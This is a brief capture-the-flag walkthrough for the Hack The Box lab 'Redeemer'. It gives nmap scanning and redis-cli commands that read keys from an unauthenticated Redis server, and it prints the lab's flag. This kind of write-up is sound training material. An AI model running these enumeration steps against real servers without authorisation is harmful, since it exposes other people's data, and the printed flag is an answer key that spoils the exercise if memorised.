RUN!
81 words
1 minute
Redeemer
just now
Machine Information
  • Platform: HTB
  • Lab: Starting Point
  • OS: Linux
  • Difficulty: Very Easy
  • IP: 10.129.136.187
Cover

Step 0: Getting Started#

If you’re not sure how to get started, this will help -> Step 0: Getting Started.

Terminal window
mkdir -p HTB/LAB/REDEEMER && cd HTB/LAB/REDEEMER
IP=10.129.136.187 && ping -c 2 $IP

See also: Here.

Are you ready? OK!


Step 1: Recon#

Terminal window
nmap -Pn -sC -sV -p- $IP

HTB-Redeemer 1

6379/tcp (Redis) is open. In-memory database — try redis-cli for enumeration.


Step 2: Solution#

Connect to Redis#

Terminal window
redis-cli -h $IP

HTB-Redeemer 2

Enumerate & Flag#

Terminal window
info
select 0
keys *
get flag
exit

Flag#

HTB-Redeemer 3

03e1d2b376c37ab3f5319922053953eb

and PASTE!

Redeemer
https://www.hackthebox.com/
Author
Alp
Published at
2026-03-18
License
CC BY-NC-SA 4.0

Some information may be outdated